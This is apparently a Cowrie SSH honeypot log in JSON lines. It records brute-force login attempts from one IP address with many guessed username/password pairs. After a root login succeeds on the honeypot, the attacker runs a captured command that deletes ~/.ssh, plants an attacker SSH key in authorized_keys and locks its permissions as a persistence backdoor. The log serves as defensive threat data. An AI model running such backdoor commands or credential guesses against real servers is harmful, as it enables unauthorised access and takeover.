{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:46.711365Z","src_ip":"212.227.235.229","session":"5221cd50c26b"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:47.684464Z","src_ip":"212.227.235.229","session":"5221cd50c26b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:48.920169Z","src_ip":"212.227.235.229","session":"5221cd50c26b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61408,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c081a615a05","protocol":"ssh","message":"New connection: 217.72.205.35:61408 (1.2.3.4:22) [session: 1c081a615a05]","sensor":"my-vps","timestamp":"2025-09-08T22:44:53.722648Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:53.723704Z","src_ip":"217.72.205.35","session":"1c081a615a05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58464,"dst_ip":"1.2.3.4","dst_port":22,"session":"a600d58ae592","protocol":"ssh","message":"New connection: 212.227.235.229:58464 (1.2.3.4:22) [session: a600d58ae592]","sensor":"my-vps","timestamp":"2025-09-08T22:45:14.200965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:45:14.201751Z","src_ip":"212.227.235.229","session":"a600d58ae592"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:45:14.525916Z","src_ip":"212.227.235.229","session":"a600d58ae592"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@123","message":"login attempt [ubuntu/Admin@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:45:15.862276Z","src_ip":"212.227.235.229","session":"a600d58ae592"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:45:17.190773Z","src_ip":"212.227.235.229","session":"a600d58ae592"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47542,"dst_ip":"1.2.3.4","dst_port":22,"session":"018b1e054289","protocol":"ssh","message":"New connection: 212.227.235.229:47542 (1.2.3.4:22) [session: 018b1e054289]","sensor":"my-vps","timestamp":"2025-09-08T22:45:29.760799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:45:29.791912Z","src_ip":"212.227.235.229","session":"018b1e054289"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:45:30.020526Z","src_ip":"212.227.235.229","session":"018b1e054289"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:45:31.029246Z","src_ip":"212.227.235.229","session":"018b1e054289"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:45:32.279248Z","src_ip":"212.227.235.229","session":"018b1e054289"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44092,"dst_ip":"1.2.3.4","dst_port":22,"session":"3de31da0ed38","protocol":"ssh","message":"New connection: 212.227.235.229:44092 (1.2.3.4:22) [session: 3de31da0ed38]","sensor":"my-vps","timestamp":"2025-09-08T22:45:34.824135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:45:34.825025Z","src_ip":"212.227.235.229","session":"3de31da0ed38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:45:35.136758Z","src_ip":"212.227.235.229","session":"3de31da0ed38"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:45:36.425748Z","src_ip":"212.227.235.229","session":"3de31da0ed38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33376,"dst_ip":"1.2.3.4","dst_port":22,"session":"c41a51554565","protocol":"ssh","message":"New connection: 212.227.235.229:33376 (1.2.3.4:22) [session: c41a51554565]","sensor":"my-vps","timestamp":"2025-09-08T22:45:37.266248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:45:37.266923Z","src_ip":"212.227.235.229","session":"c41a51554565"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:45:37.515620Z","src_ip":"212.227.235.229","session":"c41a51554565"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:45:37.739458Z","src_ip":"212.227.235.229","session":"3de31da0ed38"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-08T22:45:38.552269Z","src_ip":"212.227.235.229","session":"c41a51554565"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:45:39.803163Z","src_ip":"212.227.235.229","session":"c41a51554565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58244,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bb9c5fb009b","protocol":"ssh","message":"New connection: 212.227.235.229:58244 (1.2.3.4:22) [session: 9bb9c5fb009b]","sensor":"my-vps","timestamp":"2025-09-08T22:45:45.184661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:45:45.185414Z","src_ip":"212.227.235.229","session":"9bb9c5fb009b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:45:45.286096Z","src_ip":"212.227.235.229","session":"9bb9c5fb009b"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer@2025","message":"login attempt [deployer/deployer@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:45:45.726917Z","src_ip":"212.227.235.229","session":"9bb9c5fb009b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:45:46.830479Z","src_ip":"212.227.235.229","session":"9bb9c5fb009b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39694,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbb880e7661a","protocol":"ssh","message":"New connection: 212.227.235.229:39694 (1.2.3.4:22) [session: fbb880e7661a]","sensor":"my-vps","timestamp":"2025-09-08T22:46:00.568925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:00.569767Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:00.803158Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwert123!","message":"login attempt [root/Qwert123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:46:01.780050Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:46:02.295472Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:46:02.296278Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:46:02.297423Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:02.531619Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:46:03.057202Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.058094Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.293277Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.294564Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39708,"dst_ip":"1.2.3.4","dst_port":22,"session":"69084b91bc1f","protocol":"ssh","message":"New connection: 212.227.235.229:39708 (1.2.3.4:22) [session: 69084b91bc1f]","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.525573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.526649Z","src_ip":"212.227.235.229","session":"69084b91bc1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:03.760087Z","src_ip":"212.227.235.229","session":"69084b91bc1f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:46:04.735355Z","src_ip":"212.227.235.229","session":"69084b91bc1f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:05.972438Z","src_ip":"212.227.235.229","session":"69084b91bc1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39710,"dst_ip":"1.2.3.4","dst_port":22,"session":"db892f1710c7","protocol":"ssh","message":"New connection: 212.227.235.229:39710 (1.2.3.4:22) [session: db892f1710c7]","sensor":"my-vps","timestamp":"2025-09-08T22:46:06.209102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:06.209807Z","src_ip":"212.227.235.229","session":"db892f1710c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:06.445826Z","src_ip":"212.227.235.229","session":"db892f1710c7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:46:07.430590Z","src_ip":"212.227.235.229","session":"db892f1710c7"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:07.666774Z","src_ip":"212.227.235.229","session":"fbb880e7661a"}
